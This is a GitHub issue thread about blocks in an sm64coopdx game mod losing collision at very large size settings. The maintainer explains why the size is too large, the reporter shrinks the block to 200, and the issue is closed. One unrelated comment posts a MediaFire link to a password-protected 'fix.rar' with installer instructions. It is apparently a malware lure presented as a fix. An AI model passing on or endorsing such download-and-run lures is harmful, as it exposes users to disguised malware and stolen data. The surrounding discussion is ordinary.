### ISSUE TITLE
Block Overflow?

### ISSUE THREAD

**Issue by TheMan6900** [EmeraldLoc/tag#1113]
Set a block's size stats to 250 and itll become uncollidable

**Comment by EmeraldLoc** [comment]
Why the heck are you setting the block's size to 250

**Comment by EmeraldLoc** [comment]
Does it stop working at exactly 250, or values lower than 250? Your actual unit size is 25,000, when all vanilla levels have a size of 16,384. I can tell you that almost certainly a size of 25,000 is very unnecessary and very excessive. Please set the block size to close to the minimum it needs to be, your block is literally at the grace of sm64coopdx's max level size being increased.

**Comment by TheMan6900** [comment]
> Why the heck are you setting the block's size to 250

for level I was doing lol

**Comment by EmeraldLoc** [comment]
> Does it stop working at exactly 250, or values lower than 250? Your actual unit size is 25,000, when all vanilla levels have a size of 16,384. I can tell you that almost certainly a size of 25,000 is very unnecessary and very excessive. Please set the block size to close to the minimum it needs to be, your block is literally at the grace of sm64coopdx's max level size being increased.

I would like to correct a statement here:

While vanilla levels size are at 8192 units to -8192 units, the theoretical maximum is −32768 to 32767. Nonetheless `25,000` is still an obnoxious size for a block, and that's over tripled the size of regular vanilla stages.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by EmeraldLoc** [comment]
Does it stop working at exactly 250, or values lower/higher than 250? Has the issue since been resolved by reducing the block size? Was the block size excessive, and did you shrink it?

**Comment by TheMan6900** [comment]
I shrunk the size from 250 -> 200 and then it worked

**Comment by EmeraldLoc** [comment]
Gonna close this, believe the main issue was just that you had a ridiculously large block.
